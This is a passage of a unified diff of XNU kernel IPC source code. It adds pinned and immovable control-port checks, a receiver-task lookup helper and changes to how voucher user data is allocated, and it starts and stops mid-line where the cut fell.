port->ip_immovable_receive = true; + } - port->ip_send_turnstile = TURNSTILE_NULL; + port->ip_sync_link_state = PORT_SYNC_LINK_ANY; ipc_mqueue_kind_t kind = IPC_MQUEUE_KIND_NONE; if (flags & IPC_PORT_INIT_MESSAGE_QUEUE) { @@ -1537,7 +1517,7 @@ ipc_port_send_update_inheritor( struct knote *kn; turnstile_update_flags_t inheritor_flags = TURNSTILE_INHERITOR_TURNSTILE; - assert(imq_held(mqueue)); + imq_held(mqueue); if (!ip_active(port)) { /* this port is no longer active, it should not push anywhere */ @@ -2325,6 +2305,42 @@ ipc_port_get_watchport_inheritor( return ipc_port_watchport_elem(port)->twe_task->watchports->tw_thread; } +/* + * Routine: ipc_port_get_receiver_task + * Purpose: + * Returns receiver task pointer and its pid (if any) for port. + * + * Conditions: + * Nothing locked. + */ +pid_t +ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task) +{ + task_t receiver = TASK_NULL; + pid_t pid = -1; + + if (!port) { + goto out; + } + + ip_lock(port); + if (ip_active(port) && + MACH_PORT_VALID(port->ip_receiver_name) && + port->ip_receiver && + port->ip_receiver != ipc_space_kernel && + port->ip_receiver != ipc_space_reply) { + receiver = port->ip_receiver->is_task; + pid = task_pid(receiver); + } + ip_unlock(port); + +out: + if (task) { + *task = (uintptr_t)receiver; + } + return pid; +} + /* * Routine: ipc_port_impcount_delta * Purpose: @@ -2688,10 +2704,11 @@ ipc_port_copy_send( * Nothing locked. */ -mach_port_name_t -ipc_port_copyout_send( +static mach_port_name_t +ipc_port_copyout_send_internal( ipc_port_t sright, - ipc_space_t space) + ipc_space_t space, + ipc_object_copyout_flags_t flags) { mach_port_name_t name; @@ -2699,10 +2716,8 @@ ipc_port_copyout_send( kern_return_t kr; kr = ipc_object_copyout(space, ip_to_object(sright), - MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name); + MACH_MSG_TYPE_PORT_SEND, flags, NULL, NULL, &name); if (kr != KERN_SUCCESS) { - ipc_port_release_send(sright); - if (kr == KERN_INVALID_CAPABILITY) { name = MACH_PORT_DEAD; } else { @@ -2716,28 +2731,38 @@ ipc_port_copyout_send( return name; } +mach_port_name_t +ipc_port_copyout_send( + ipc_port_t sright, + ipc_space_t space) +{ + return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_NONE); +} + +mach_port_name_t +ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space) +{ + return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_PINNED); +} + /* - * Routine: ipc_port_release_send + * Routine: ipc_port_release_send_and_unlock * Purpose: * Release a naked send right. * Consumes a ref for the port. * Conditions: - * Nothing locked. + * Port is valid and locked on entry + * Port is unlocked on exit. */ - void -ipc_port_release_send( +ipc_port_release_send_and_unlock( ipc_port_t port) { ipc_port_t nsrequest = IP_NULL; mach_port_mscount_t mscount; - if (!IP_VALID(port)) { - return; - } - - ip_lock(port); - assert(port->ip_srights > 0); if (port->ip_srights == 0) { panic("Over-release of port %p send right!", port); @@ -2765,6 +2790,25 @@ ipc_port_release_send( } } +/* + * Routine: ipc_port_release_send + * Purpose: + * Release a naked send right. + * Consumes a ref for the port. + * Conditions: + * Nothing locked. + */ + +void +ipc_port_release_send( + ipc_port_t port) +{ + if (IP_VALID(port)) { + ip_lock(port); + ipc_port_release_send_and_unlock(port); + } +} + /* * Routine: ipc_port_make_sonce_locked * Purpose: @@ -2895,17 +2939,16 @@ ipc_port_alloc_special( { ipc_port_t port; - port = ip_object_to_port(io_alloc(IOT_PORT)); + port = ip_object_to_port(io_alloc(IOT_PORT, Z_WAITOK | Z_ZERO)); if (port == IP_NULL) { return IP_NULL; } -#if MACH_ASSERT +#if MACH_ASSERT uintptr_t buf[IP_CALLSTACK_MAX]; ipc_port_callstack_init_debug(&buf[0], IP_CALLSTACK_MAX); #endif /* MACH_ASSERT */ - bzero((char *)port, sizeof(*port)); io_lock_init(ip_to_object(port)); port->ip_references = 1; port->ip_object.io_bits = io_makebits(TRUE, IOT_PORT, 0); diff --git a/osfmk/ipc/ipc_port.h b/osfmk/ipc/ipc_port.h index 2784c3c73..5dfcabe5f 100644 --- a/osfmk/ipc/ipc_port.h +++ b/osfmk/ipc/ipc_port.h @@ -141,8 +141,9 @@ struct ipc_port { struct ipc_port *ip_pdrequest; struct ipc_port_request *ip_requests; union { - struct ipc_kmsg *premsg; + struct ipc_kmsg *XNU_PTRAUTH_SIGNED_PTR("ipc_port.premsg") premsg; struct turnstile *send_turnstile; + ipc_port_t XNU_PTRAUTH_SIGNED_PTR("ipc_port.alt_port") alt_port; } kdata2; mach_vm_address_t ip_context; @@ -160,7 +161,8 @@ struct ipc_port { ip_no_grant:1, /* Port wont accept complex messages containing (ool) port descriptors */ ip_immovable_send:1, /* No send(once) rights to this port can be moved out of a space */ ip_tg_block_tracking:1, /* Track blocking relationship between thread groups during sync IPC */ - ip_impcount:17; /* number of importance donations in nested queue */ + ip_pinned: 1, /* Can't deallocate the last send right from a space while the bit is set */ + ip_impcount:16; /* number of importance donations in nested queue */ mach_port_mscount_t ip_mscount; mach_port_rights_t ip_srights; @@ -201,6 +203,7 @@ struct ipc_port { #define ip_premsg kdata2.premsg #define ip_send_turnstile kdata2.send_turnstile +#define ip_alt_port kdata2.alt_port #define port_send_turnstile(port) (IP_PREALLOC(port) ? (port)->ip_premsg->ikm_turnstile : (port)->ip_send_turnstile) @@ -284,10 +287,10 @@ MACRO_END #define ip_kotype(port) io_kotype(ip_to_object(port)) #define ip_is_kobject(port) io_is_kobject(ip_to_object(port)) +#define ip_is_control(port) \ + (ip_is_kobject(port) && (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_THREAD_CONTROL)) #define ip_is_kolabeled(port) io_is_kolabeled(ip_to_object(port)) #define ip_get_kobject(port) ipc_kobject_get(port) -#define ip_label_check(space, port, msgt_name) \ - (!ip_is_kolabeled(port) || ipc_kobject_label_check((space), (port), (msgt_name))) #define ip_full_kernel(port) imq_full_kernel(&(port)->ip_messages) #define ip_full(port) imq_full(&(port)->ip_messages) @@ -678,11 +681,17 @@ extern mach_port_name_t ipc_port_copyout_send( ipc_port_t sright, ipc_space_t space); +extern mach_port_name_t ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space); + extern void ipc_port_thread_group_blocked( ipc_port_t port); extern void ipc_port_thread_group_unblocked(void); +extern void ipc_port_release_send_and_unlock( + ipc_port_t port); #endif /* MACH_KERNEL_PRIVATE */ #if KERNEL_PRIVATE @@ -717,10 +726,13 @@ extern void ipc_port_release_sonce( extern void ipc_port_release_receive( ipc_port_t port); -/* finalize the destruction of a port before it gets freed */ +/* Finalize the destruction of a port before it gets freed */ extern void ipc_port_finalize( ipc_port_t port); +/* Get receiver task and its pid (if any) for port. */ +extern pid_t ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task); + /* Allocate a port in a special space */ extern ipc_port_t ipc_port_alloc_special( ipc_space_t space, diff --git a/osfmk/ipc/ipc_pset.c b/osfmk/ipc/ipc_pset.c index 7f247520f..3af85d1df 100644 --- a/osfmk/ipc/ipc_pset.c +++ b/osfmk/ipc/ipc_pset.c @@ -176,13 +176,11 @@ ipc_pset_alloc_special( assert(space->is_table == IE_NULL); assert(!is_active(space)); - pset = ips_object_to_pset(io_alloc(IOT_PORT_SET)); + pset = ips_object_to_pset(io_alloc(IOT_PORT_SET, Z_WAITOK | Z_ZERO)); if (pset == IPS_NULL) { return IPS_NULL; } - bzero((char *)pset, sizeof(*pset)); - io_lock_init(ips_to_object(pset)); pset->ips_references = 1; pset->ips_object.io_bits = io_makebits(TRUE, IOT_PORT_SET, 0); @@ -991,7 +989,7 @@ filt_machportevent(struct knote *kn, long hint __assert_only) int result = 0; /* mqueue locked by caller */ - assert(imq_held(mqueue)); + imq_held(mqueue); assert(hint != NOTE_REVOKE); if (imq_is_valid(mqueue)) { assert(!imq_is_set(mqueue)); diff --git a/osfmk/ipc/ipc_right.c b/osfmk/ipc/ipc_right.c index 78fd32c6e..49ce92268 100644 --- a/osfmk/ipc/ipc_right.c +++ b/osfmk/ipc/ipc_right.c @@ -182,13 +182,13 @@ ipc_right_lookup_two_write( * Translate (space, object) -> (name, entry). * Only finds send/receive rights. * Returns TRUE if an entry is found; if so, - * the object is locked and active. + * the object active. * Conditions: * The space must be locked (read or write) and active. - * Nothing else locked. + * The port is locked and active */ -boolean_t +bool ipc_right_reverse( ipc_space_t space, ipc_object_t object, @@ -205,13 +205,9 @@ ipc_right_reverse( assert(io_otype(object) == IOT_PORT); port = ip_object_to_port(object); + require_ip_active(port); - ip_lock(port); - if (!ip_active(port)) { - ip_unlock(port); - - return FALSE; - } + ip_lock_held(port); if (port->ip_receiver == space) { name = port->ip_receiver_name; @@ -225,7 +221,7 @@ ipc_right_reverse( *namep = name; *entryp = entry; - return TRUE; + return true; } if (ipc_hash_lookup(space, ip_to_object(port), namep, entryp)) { @@ -233,11 +229,10 @@ ipc_right_reverse( assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_SEND); assert(port == ip_object_to_port(entry->ie_object)); - return TRUE; + return true; } - ip_unlock(port); - return FALSE; + return false; } /* @@ -304,7 +299,7 @@ ipc_right_request_alloc( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { /* port is locked and active */ /* if no new request, just cancel previous */ @@ -468,27 +463,20 @@ ipc_right_request_cancel( * Returns TRUE if it is. * Conditions: * The space is write-locked and active. - * It is unlocked if the entry is inuse. */ -boolean_t +bool ipc_right_inuse( - ipc_space_t space, - __unused mach_port_name_t name, - ipc_entry_t entry) + ipc_entry_t entry) { - if (IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE) { - is_write_unlock(space); - return TRUE; - } - return FALSE; + return IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE; } /* * Routine: ipc_right_check * Purpose: * Check if the port has died. If it has, - * and IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not + * and IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not * passed and it is not a send once right then * clean up the entry and return TRUE. * Conditions: @@ -506,7 +494,7 @@ ipc_right_check( ipc_port_t port, mach_port_name_t name, ipc_entry_t entry, - ipc_right_copyin_flags_t flags) + ipc_object_copyin_flags_t flags) { ipc_entry_bits_t bits; @@ -515,7 +503,7 @@ ipc_right_check( ip_lock(port); if (ip_active(port) || - ((flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) && + ((flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) && entry->ie_request == IE_REQ_NONE && (entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE))) { return FALSE; @@ -861,6 +849,7 @@ ipc_right_destroy( * Returns: * KERN_SUCCESS A user ref was released. * KERN_INVALID_RIGHT Entry has wrong type. + * KERN_INVALID_CAPABILITY Deallocating a pinned right. */ kern_return_t @@ -933,7 +922,7 @@ dead_name: port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME); goto dead_name; /* it will release port */ @@ -976,7 +965,7 @@ dead_name: port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME); goto dead_name; /* it will release port */ @@ -986,6 +975,14 @@ dead_name: assert(port->ip_srights > 0); if (IE_BITS_UREFS(bits) == 1) { + if (pinned_control_port_enabled && port->ip_pinned != 0) { + ip_unlock(port); + is_write_unlock(space); + mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC, + ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ? + kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL); + return KERN_INVALID_CAPABILITY; + } if (--port->ip_srights == 0) { nsrequest = port->ip_nsrequest; if (nsrequest != IP_NULL) { @@ -1087,6 +1084,7 @@ dead_name: * KERN_SUCCESS Count was modified. * KERN_INVALID_RIGHT Entry has wrong type. * KERN_INVALID_VALUE Bad delta for the right. + * KERN_INVALID_CAPABILITY Deallocating a pinned right. */ kern_return_t @@ -1268,7 +1266,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { assert(!(entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE)); mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_RIGHT); goto invalid_right; @@ -1318,7 +1316,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { /* port is locked and active */ ip_unlock(port); port = IP_NULL; @@ -1408,7 +1406,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { assert((entry->ie_bits & MACH_PORT_TYPE_SEND) == 0); goto invalid_right; } @@ -1445,6 +1443,11 @@ ipc_right_delta( } if ((urefs + delta) == 0) { + if (pinned_control_port_enabled && port->ip_pinned != 0) { + ip_unlock(port); + goto pinned_right; + } + if (--port->ip_srights == 0) { nsrequest = port->ip_nsrequest; if (nsrequest != IP_NULL) { @@ -1523,6 +1526,15 @@ invalid_right: } return KERN_INVALID_RIGHT; +pinned_right: + assert(pinned_control_port_enabled); + + is_write_unlock(space); + mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC, + ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ? + kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL); + return KERN_INVALID_CAPABILITY; + invalid_value: is_write_unlock(space); mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_VALUE); @@ -1772,7 +1784,7 @@ ipc_right_info( * types while we still have it locked. Otherwise, * recapture the (now dead) bits. */ - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { if (request != IE_REQ_NONE) { type |= ipc_port_request_type(port, name, request); } @@ -1864,8 +1876,10 @@ ipc_right_copyin_check_reply( * be read without a lock. */ if (reply_port->ip_immovable_send) { - mach_port_guard_exception(reply_name, 0, 0, kGUARD_EXC_IMMOVABLE); - return FALSE; + if (!ip_is_control(reply_port) || immovable_control_port_enabled) { + mach_port_guard_exception_immovable(reply_name, reply_port, MPG_FLAGS_NONE); + return FALSE; + } } if (reply_type == MACH_MSG_TYPE_MOVE_SEND_ONCE) { @@ -1943,7 +1957,8 @@ ipc_right_copyin_check_guard_locked( * Returns: * KERN_SUCCESS Acquired an object, possibly IO_DEAD. * KERN_INVALID_RIGHT Name doesn't denote correct right. - * KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right + * KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right, + * or moving the last ref of pinned right * KERN_INVALID_ARGUMENT Port is unguarded or guard mismatch */ @@ -1953,7 +1968,7 @@ ipc_right_copyin( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, - ipc_right_copyin_flags_t flags, + ipc_object_copyin_flags_t flags, ipc_object_t *objectp, ipc_port_t *sorightp, ipc_port_t *releasep, @@ -1964,8 +1979,9 @@ ipc_right_copyin( ipc_entry_bits_t bits; ipc_port_t port; kern_return_t kr; - boolean_t deadok = flags & IPC_RIGHT_COPYIN_FLAGS_DEADOK? TRUE : FALSE; - boolean_t allow_imm_send = flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND? TRUE : FALSE; + boolean_t deadok = !!(flags & IPC_OBJECT_COPYIN_FLAGS_DEADOK); + boolean_t allow_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); + boolean_t soft_fail_imm_send = !!(flags & IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND); *releasep = IP_NULL; *assertcntp = 0; @@ -2136,7 +2152,7 @@ ipc_right_copyin( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; *releasep = port; goto copy_dead; @@ -2152,9 +2168,13 @@ ipc_right_copyin( } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if (!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } ipc_port_copy_send_locked(port); @@ -2183,7 +2203,7 @@ ipc_right_copyin( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; *releasep = port; goto move_dead; @@ -2193,15 +2213,18 @@ ipc_right_copyin( if ((bits & MACH_PORT_TYPE_SEND) == 0) { assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE); assert(port->ip_sorights > 0); - ip_unlock(port); goto invalid_right; } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if (!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } if (IE_BITS_UREFS(bits) == 1) { @@ -2211,6 +2234,7 @@ ipc_right_copyin( assert(port->ip_receiver == space); assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_RECEIVE); + assert(port->ip_pinned == 0); ip_reference(port); } else { @@ -2281,9 +2305,13 @@ ipc_right_copyin( } if (!allow_imm_send && port->ip_immovable_send) { - ip_unlock(port); - mach_port_guard_exception(name, 0, 0, kGUARD_EXC_IMMOVABLE); - return KERN_INVALID_CAPABILITY; + if (!ip_is_control(port) || immovable_control_port_enabled) { + ip_unlock(port); + if (!soft_fail_imm_send) { + mach_port_guard_exception_immovable(name, port, MPG_FLAGS_NONE); + } + return KERN_INVALID_CAPABILITY; + } } assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_SEND_ONCE); @@ -2392,7 +2420,7 @@ ipc_right_copyin_two_move_sends( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { *releasep = port; goto invalid_right; } @@ -2520,7 +2548,7 @@ ipc_right_copyin_two( ipc_object_t object_two; kr = ipc_right_copyin(space, name, entry, - msgt_one, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, + msgt_one, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, objectp, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2539,7 +2567,7 @@ ipc_right_copyin_two( * receive right. */ kr = ipc_right_copyin(space, name, entry, - msgt_two, IPC_RIGHT_COPYIN_FLAGS_NONE, + msgt_two, IPC_OBJECT_COPYIN_FLAGS_NONE, &object_two, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2579,7 +2607,7 @@ ipc_right_copyin_two( } kr = ipc_right_copyin(space, name, entry, - msgt_name, IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, + msgt_name, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND, objectp, sorightp, releasep, &assertcnt, 0, NULL); assert(assertcnt == 0); @@ -2626,6 +2654,7 @@ ipc_right_copyout( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, ipc_object_t object) @@ -2642,6 +2671,12 @@ ipc_right_copyout( port = ip_object_to_port(object); + if (pinned_control_port_enabled && (flags & IPC_OBJECT_COPYOUT_FLAGS_PINNED)) { + assert(!port->ip_pinned); + assert(port->ip_immovable_send); + port->ip_pinned = 1; + } + switch (msgt_name) { case MACH_MSG_TYPE_PORT_SEND_ONCE: diff --git a/osfmk/ipc/ipc_right.h b/osfmk/ipc/ipc_right.h index a3049efc7..fcaefbad6 100644 --- a/osfmk/ipc/ipc_right.h +++ b/osfmk/ipc/ipc_right.h @@ -74,13 +74,6 @@ #define ipc_right_lookup_read ipc_right_lookup_write #define ipc_right_lookup_two_read ipc_right_lookup_two_write -typedef uint32_t ipc_right_copyin_flags_t; - -#define IPC_RIGHT_COPYIN_FLAGS_NONE 0x0 -#define IPC_RIGHT_COPYIN_FLAGS_DEADOK 0x1 -#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x2 -#define IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE 0x4 /* allow copyin of a send once right to a dead port with no dead name requests */ - /* Find an entry in a space, given the name */ extern kern_return_t ipc_right_lookup_write( ipc_space_t space, @@ -96,7 +89,7 @@ extern kern_return_t ipc_right_lookup_two_write( ipc_entry_t *entryp2); /* Translate (space, object) -> (name, entry) */ -extern boolean_t ipc_right_reverse( +extern bool ipc_right_reverse( ipc_space_t space, ipc_object_t object, mach_port_name_t *namep, @@ -123,9 +116,7 @@ extern ipc_port_t ipc_right_request_cancel( ipc_right_request_cancel((space), (port), (name), (entry))) /* Check if an entry is being used */ -extern boolean_t ipc_right_inuse( - ipc_space_t space, - mach_port_name_t name, +extern bool ipc_right_inuse( ipc_entry_t entry); /* Check if the port has died */ @@ -134,7 +125,7 @@ extern boolean_t ipc_right_check( ipc_port_t port, mach_port_name_t name, ipc_entry_t entry, - ipc_right_copyin_flags_t flags); + ipc_object_copyin_flags_t flags); /* Clean up an entry in a dead space */ extern void ipc_right_terminate( @@ -193,7 +184,7 @@ extern kern_return_t ipc_right_copyin( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, - ipc_right_copyin_flags_t flags, + ipc_object_copyin_flags_t flags, ipc_object_t *objectp, ipc_port_t *sorightp, ipc_port_t *releasep, @@ -218,6 +209,7 @@ extern kern_return_t ipc_right_copyout( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, ipc_object_t object); diff --git a/osfmk/ipc/ipc_types.h b/osfmk/ipc/ipc_types.h index f5fde0dae..ce2eb4664 100644 --- a/osfmk/ipc/ipc_types.h +++ b/osfmk/ipc/ipc_types.h @@ -63,10 +63,16 @@ typedef struct ipc_kmsg *ipc_kmsg_t; typedef uint8_t sync_qos_count_t; typedef uint64_t ipc_label_t; -#define IPC_LABEL_NONE ((ipc_label_t)0x0) -#define IPC_LABEL_DEXT ((ipc_label_t)0x1) -#define IPC_LABEL_PLATFORM ((ipc_label_t)0x2) -#define IPC_LABEL_SPECIAL ((ipc_label_t)0x3) +#define IPC_LABEL_NONE ((ipc_label_t)0x0000) +#define IPC_LABEL_DEXT ((ipc_label_t)0x0001) +#define IPC_LABEL_PLATFORM ((ipc_label_t)0x0002) +#define IPC_LABEL_SPECIAL ((ipc_label_t)0x0003) +#define IPC_LABEL_SPACE_MASK ((ipc_label_t)0x00ff) + +#define IPC_LABEL_SUBST_TASK ((ipc_label_t)0x0100) +#define IPC_LABEL_SUBST_THREAD ((ipc_label_t)0x0200) +#define IPC_LABEL_SUBST_ONCE ((ipc_label_t)0x0300) +#define IPC_LABEL_SUBST_MASK ((ipc_label_t)0xff00) typedef struct ipc_kobject_label *ipc_kobject_label_t; diff --git a/osfmk/ipc/ipc_voucher.c b/osfmk/ipc/ipc_voucher.c index 4a753c737..f8673f325 100644 --- a/osfmk/ipc/ipc_voucher.c +++ b/osfmk/ipc/ipc_voucher.c @@ -364,7 +364,7 @@ unsafe_convert_port_to_voucher( * keeps the voucher bound to the port (and active). */ if (ip_kotype(port) == IKOT_VOUCHER) { - return (uintptr_t)port->ip_kobject; + return (uintptr_t)ipc_kobject_get(port); } } return (uintptr_t)IV_NULL; @@ -492,7 +492,7 @@ convert_voucher_to_port(ipc_voucher_t voucher) * if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&voucher->iv_port, - (ipc_kobject_t)voucher, IKOT_VOUCHER, false, 0)) { + (ipc_kobject_t)voucher, IKOT_VOUCHER, IPC_KOBJECT_ALLOC_NONE, false, 0)) { ipc_voucher_release(voucher); } return voucher->iv_port; @@ -706,7 +706,7 @@ convert_voucher_attr_control_to_port(ipc_voucher_attr_control_t control) * ipc_voucher_attr_control_notify if this is the first send right */ if (!ipc_kobject_make_send_lazy_alloc_port(&control->ivac_port, - (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, false, 0)) { + (ipc_kobject_t)control, IKOT_VOUCHER_ATTR_CONTROL, IPC_KOBJECT_ALLOC_NONE, false, 0)) { ivac_release(control); } return control->ivac_port; @@ -2876,7 +2876,7 @@ struct user_data_value_element { iv_index_t e_sum; iv_index_t e_hash; queue_chain_t e_hash_link; - uint8_t e_data[]; + uint8_t *e_data; }; typedef struct user_data_value_element *user_data_element_t; @@ -2967,6 +2967,13 @@ ipc_voucher_attr_control_t test_control; #define USER_DATA_ASSERT_KEY(key) assert(MACH_VOUCHER_ATTR_KEY_TEST == (key)) #endif +static void +user_data_value_element_free(user_data_element_t elem) +{ + kheap_free(KHEAP_DATA_BUFFERS, elem->e_data, elem->e_size); + kfree(elem, sizeof(struct user_data_value_element)); +} + /* * Routine: user_data_release_value * Purpose: @@ -2996,7 +3003,7 @@ user_data_release_value( if (sync == elem->e_made) { queue_remove(&user_data_bucket[hash], elem, user_data_element_t, e_hash_link); user_data_unlock(); - kfree(elem, sizeof(*elem) + elem->e_size); + user_data_value_element_free(elem); return KERN_SUCCESS; } assert(sync < elem->e_made); @@ -3076,7 +3083,7 @@ retry: user_data_unlock(); if (NULL != alloc) { - kfree(alloc, sizeof(*alloc) + content_size); + user_data_value_element_free(alloc); } return elem; @@ -3086,11 +3093,12 @@ retry: if (NULL == alloc) { user_data_unlock(); - alloc = (user_data_element_t)kalloc(sizeof(*alloc) + content_size); + alloc = kalloc(sizeof(struct user_data_value_element)); alloc->e_made = 1; alloc->e_size = content_size; alloc->e_sum = sum; alloc->e_hash = hash; + alloc->e_data = kheap_alloc(KHEAP_DATA_BUFFERS, content_size, Z_WAITOK | Z_NOFAIL); memcpy(alloc->e_data, content, content_size); goto retry; } diff --git a/osfmk/ipc/mach_debug.c b/osfmk/ipc/mach_debug.c index 903fc3bde..6ad851ac5 100644 --- a/osfmk/ipc/mach_debug.c +++ b/osfmk/ipc/mach_debug.c @@ -203,7 +203,7 @@ mach_port_space_info( } #if !(DEVELOPMENT || DEBUG) && CONFIG_MACF - const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task) == 0); + const boolean_t dbg_ok = (mac_task_check_expose_task(kernel_task, TASK_FLAVOR_CONTROL) == 0); #else const boolean_t dbg_ok = TRUE; #endif diff --git a/osfmk/ipc/mach_kernelrpc.c b/osfmk/ipc/mach_kernelrpc.c index 66263ba91..49eb98146 100644 --- a/osfmk/ipc/mach_kernelrpc.c +++ b/osfmk/ipc/mach_kernelrpc.c @@ -37,6 +37,7 @@ #include #include #include +#include kern_return_t mach_port_get_attributes( @@ -46,6 +47,8 @@ mach_port_get_attributes( mach_port_info_t info, mach_msg_type_number_t *count); +extern lck_mtx_t g_dyldinfo_mtx; + int _kernelrpc_mach_vm_allocate_trap(struct _kernelrpc_mach_vm_allocate_trap_args *args) { @@ -281,7 +284,7 @@ _kernelrpc_mach_port_insert_right_trap(struct _kernelrpc_mach_port_insert_right_ } rv = ipc_object_copyin(task->itk_space, args->poly, args->polyPoly, - (ipc_object_t *)&port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + 